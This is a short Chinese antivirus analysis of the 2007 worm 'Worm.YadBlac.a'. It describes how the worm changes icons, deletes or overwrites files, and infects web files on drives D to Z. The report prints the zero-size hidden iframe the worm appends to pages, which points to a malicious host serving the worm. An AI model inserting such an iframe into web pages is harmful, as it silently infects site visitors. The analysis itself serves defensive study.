 |
瑞星最新病毒分析报告:"Worm.YadBlac.a"
www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------ |
这是一个采用Dehlip编写的蠕虫 病毒。 一、中毒后的现像:
1、所有的图标会变成一个黑炸弹的图标:
2、激活该蠕虫时会有以下的对话框出现:
二、破坏行为:
1、感染网页相关文件。
该蠕虫会感染D盘到Z盘上的.asp|.htm|.html|.aspx|.PHP|.JSP文件。在原文件最后插入一个Iframe标签,使用户不知不觉中访问恶意站点。Iframe标签的内容如下:
<iframesrc='http://www.dadayouxi.net/Black-Day.htm'width=0height=0></iframe>
其中,http://www.dadayouxi.net网站含有恶意代码,打开该网站时,该蠕虫已经被下载到本地计算机并尝试运行。
2、破坏文件。
该蠕虫会把D盘到Z盘上所有的小于自身文件长度的文件删除,然后把自己伪装成目标文件。对于大于自身文件长度的文件,该蠕虫将用自己的文件内容覆盖目标文件,目标文件长度不发生改变。被破坏的文件的文件名不会发生改变。
|
|
| ------------------------------------------------------------------------------------------- |
上一篇:蠕虫木马泛滥专找艾妮漏洞
下一篇:模仿熊猫烧香 近日网游盗号病毒一览 |
| ------------------------------------------------------------------------------------------- |
|
|
|
 |
|
|
当前位置:
